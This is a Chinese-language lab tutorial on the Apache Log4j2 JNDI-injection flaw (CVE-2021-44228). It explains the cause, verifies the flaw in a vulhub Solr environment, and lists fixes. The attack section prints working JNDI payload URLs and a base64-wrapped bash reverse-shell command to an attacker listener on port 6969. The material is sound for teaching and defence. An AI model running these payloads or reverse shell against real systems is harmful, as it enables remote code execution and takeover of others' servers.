Apache Log4j2（远程代码执行漏洞）

本文介绍: 1、下载、解压、重命名 vulhub–master.zip为vulhub 2、进入漏洞环境下，启动该环境。 3、访问目标靶场： 4、在Dnslog.cn中生成接收信息的域名。 5、提交 dnslog p a y load 参数，进行访问。 6、可以发现 dnslog 接收到返回的信息，证明存在 log4

简介

        Ap a ch e Lo g4j2是一个基于Ja va的日志记录工具，该日志框架被大量用于业务系统开发，用来记录日志信息。

        Lo g4j2组件在处理程序日志记录时存在JNDI注入缺陷，攻击者仅仅需要向目标服务器发送精心构造的恶意数据触发Lo g4j2组件解析缺陷，就可以实现目标服务器任意命令执行，获取目标服务器权限。

        由于日志记录存在的普遍性，所以该漏洞具有危害程度高、利用难度低、影响范围大、后续影响广的特点。可以预见，未来数月甚至数年该漏洞才能得到比较全面的修补。

        漏洞涉及CVE编号：CVE-2021-44228 CNVD-2021-95919

        漏洞影响版本：Apach e log4j2 2.0 至 2.14.1 版本

        已知受影响的应用及组件，如 spring–boot–strat e r–log4j2 / Apach e Solr / Ap ac he Flink / Apac he Druid等。

原理

org.apache.logging.log4j.core.pattern.MessagePat ternCon verter类的format()方法发现日志中包含“${”就会将表达式的内容替换为表达式解析后的内容，而不是表达式本身，从而导致攻击者构造符合要求的表达式供系统执行。

org.apache.logging.log4j.core.lookup.StrSubs ti tut or中提取参数并通过 lookup进行内容替换，当日志在打印时遇到“${”后，Int erp olat or类以“：”号作为分割，将表达式内容分割成两部分，前面部分作为pre fix，后面部分作为key。然后通过 pre fix去找对应的lookup，通过对应的lookup 实例调用 lookup 方法，最后将key作为参数带入执行。

目前网络上传播广泛的poc“${jndi:ldap://my–ip/exp}”，除了利用到 log4j的递归解析，同样涉及到了jndi 注入，所谓的JNDI注入就是当上文代码中jnd i 变量可控时引发的漏洞，它将导致远程 class 文件加载，从而导致远程代码执行。当这条语句被传入到log4j日志文件中，lookup会将jnd i 注入可执行语句执行，程序会通过 ld ap 协议访问 my–ip这个地址，然后 m y–ip就会返回一个包含java 代码的class 文件的地址，然后程序再通过返回的地址下载 class 文件并执行，从而达成漏洞利用目的。

        漏洞大致利用流程：

        第一步：向目标发送指定pay load，目标对payload进行解析执行，然后会通过 ld ap 链接远程服务，当ld ap服务收到请求之后，将请求进行重定向到恶意 java class的地址。

        第二步：目标服务器收到重定向请求之后，下载恶意class并执行其中的代码，从而执行系统命令。

验证

1、下载、解压、重命名 vulhub–master.zip为vulhub

2、进入漏洞环境下，启动该环境。

cd vulhub/log4j/CVE-2021-44228

docker–compose up –d 启动环境

3、访问目标靶场：http://your-ip:8983

4、在Dnslog.cn中生成接收信息的域名。

5、提交 dnslog paylo ad 参数，进行访问。

http://your-ip:8983/solr/admin/cores?action=${jndi:ldap://nkvwta.dnslog.cn}

6、可以发现 dnslog 接收到返回的信息，证明存在 log4j2漏洞。

攻击

1、下载工具JNDI-Injec ti on-Explo i t-1.0-SNAPSHOT-all.jar（在To o ls 目录下），下载地址：

https://github.com/bkfish/Apache-Log4j-Learning/

2、进入工具所在目录下，利用工具构造paylo ad(your–ip指攻击机kali的ip，6969指的是kali 需要监听的端口)

java –jar JNDI-Injec ti on-Explo i t-1.0-SNAPSHOT-all.jar -C bash –c “{echo,bash –i >& /dev/tcp/your–ip/6969 0>&1}|{base64,-d}|{bash,-i}” -A your–ip

在使用时需要将红色部分进行base64加密。

3、如图所示生成了两种协议的paylo ad 参数（得到rm i、ldap 参数）

4、开启 kali 监听6969端口

5、利用生成的协议参数构造paylo ad，进行攻击

?action=${jndi:rmi://192.168.220.147:1099/iixqsf}

6、Kali机监听端口6969获取到目标权限。

修复

1、升级至最新版本：https://github.com/apache/logging–log4j2/release s/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范：

        1.添加 jvm 启动参数-Dlog4j2.formatMsgNoLookups=true

        2.在应用 class path下添加 log4j2.component.properties 配置文件，文件内容为log4j2.formatMsgNoLookups=true；

        3.JDK使用11.0.1、8u191、7u201、6u211及以上的高版本；

        4.部署使用第三方防火墙产品进行安全防护。